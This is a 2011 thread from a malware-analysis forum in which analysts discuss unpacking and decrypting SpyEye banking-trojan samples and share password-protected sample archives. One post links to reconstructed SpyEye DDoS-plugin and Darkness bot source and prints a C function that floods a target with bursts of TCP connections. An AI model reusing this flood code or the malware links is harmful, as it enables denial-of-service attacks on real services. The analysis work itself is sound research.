A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #7140  by USForce
 Fri Jul 08, 2011 10:33 am
EP_X0FF wrote: An surprise? Quite primitive.
Yeah, let me say that SpyEye is become pretty trivial to unpack and decode. I'd say it's almost boring :D
 #7144  by cronos713
 Fri Jul 08, 2011 1:52 pm
Hi EP_X0FF, thank you very much. Yes, this is quite primitive, about six months ago.
USForce, you have something script for this?
 #7146  by EP_X0FF
 Fri Jul 08, 2011 2:09 pm
It can't be so old (6 months). Maybe 1.5 or 2-3. What scripts? For this skiddie crypter bpx NtWriteVirtualMemory - decryption done.
 #7151  by cronos713
 Fri Jul 08, 2011 3:54 pm
Thanks! Yes, may be more recent. I mean a script that automates the task of the genre .zip + the pass [md5]
The following shows what is new
Attachments
pass: infected
(363.24 KiB) Downloaded 49 times
 #7152  by EP_X0FF
 Fri Jul 08, 2011 4:06 pm
It's the same. Just recrypted.
 #7210  by kmd
 Mon Jul 11, 2011 1:02 pm
someone fully reconstructed ddos plug of spyeye shi.. i mean kit xD

http://demonteam.narod.ru/download/P1.rar. PASS: 666
Code: Select all
void cmd_ssyn(LPSTR host, u_short port, DWORD second)
{
	WSADATA wsadata;
	SOCKADDR_IN sin;
	u_long mode = 1;
	SOCKET s;
	SOCKET ss[100];
	
	if(WSAStartup(MAKEWORD(2, 0/*!? 2*/), &wsadata))
	{
		DWORD inetaddr = resolve(host);
		sin.sin_family = AF_INET;
		sin.sin_port = htons(port);
		sin.sin_addr.s_addr = inetaddr;
		
		int st = GetTickCount(); // start time
		while(GetTickCount()-st <= second*1000) // тайм-аут
		{
			for(int i=0; i < 100; i++)
			{
				if(Stop) break;
				s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
				ss[i] = s;
				if(s != INVALID_SOCKET)
				{
					ioctlsocket(s, FIONBIO, &mode);
				}
			}
			for(int i=0; i < 100; i++)
			{
				connect(ss[i], (SOCKADDR*)&sin, sizeof(sin));
			}
			Sleep(100);
			for(int i=0; i < 100; i++)
			{
				closesocket(ss[i]);
			}
		}
	}
}
+ Darkness bot partial source

http://demonteam.narod.ru/download/P2.rar. PASS: 666
 #7216  by pigindrin
 Mon Jul 11, 2011 4:02 pm
Hi, could anyone help me and post a "how to" to unpack and decode Spyeye samples?. It would be great to analyze them. I know that for USForce is trivial, but if you could give me a hand, I´ll appreciate.
 #7217  by EP_X0FF
 Mon Jul 11, 2011 4:32 pm
Everything become trivial when you do this few thousand times. No manual for "unpacking" SpyEye since there are nothing to unpack except UPX or PECompact. They are using several different crypters in combination with packers which I highlighted before. So you need to know in general how to debug and reverse programs and malware. About your second question refer to page #10 where I posted decoder. Slightly modified it will work for all available bot versions including old v1.2
  • 1
  • 19
  • 20
  • 21
  • 22
  • 23
  • 42